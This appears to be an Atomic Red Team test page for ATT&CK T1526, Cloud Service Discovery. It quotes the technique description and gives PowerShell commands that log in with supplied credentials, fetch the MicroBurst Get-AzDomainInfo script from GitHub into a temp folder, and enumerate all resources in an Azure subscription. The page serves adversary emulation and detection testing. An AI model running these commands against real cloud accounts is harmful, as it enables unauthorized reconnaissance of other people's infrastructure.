T1526
Cloud Service Discovery
Description from ATT&CK
An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Atomic Tests
Atomic Test #1 - Azure - Dump Subscription Data with MicroBurst
Upon successful execution, this test will enumerate all resources that are contained within a valid Azure subscription. The resources enumerated will display on screen, as well as several csv files and folders will be output to a specified directory, listing what resources were discovered by the script. See https://dev.to/cheahengsoon/enumerating-subscription-information-with-microburst-35a1
Supported Platforms: iaas:azure
auto_generated_guid: 1e40bb1d-195e-401e-a86b-c192f55e005c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Azure AD username | string | None |
| password | Azure AD password | string | T1082Az |
| output_directory | Directory to output results to | string | $env:temp\T1526Test1 |
| subscription_name | Azure subscription name to scan | string | None |
Attack Commands: Run with powershell!
1
2
3
4
5
6
import-module "$env:temp\Get-AzDomainInfo.ps1"
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential | out-null
Get-AzDomainInfo -folder #{output_directory} -subscription "#{subscription_name}" -verbose
Cleanup Commands:
1
2
remove-item #{output_directory} -recurse -force -erroraction silentlycontinue
Dependencies: Run with powershell!
Description: The Get-AzDomainInfo script must exist in $env:temp.
Check Prereq Commands:
1
2
if (test-path $env:temp\Get-AzDomainInfo.ps1){exit 0} else {exit 1}
Get Prereq Commands:
1
2
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "$env:temp\Get-AzDomainInfo.ps1"
Description: The Az module must be installed.
Check Prereq Commands:
1
2
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
1
2
Install-Module -Name Az -Force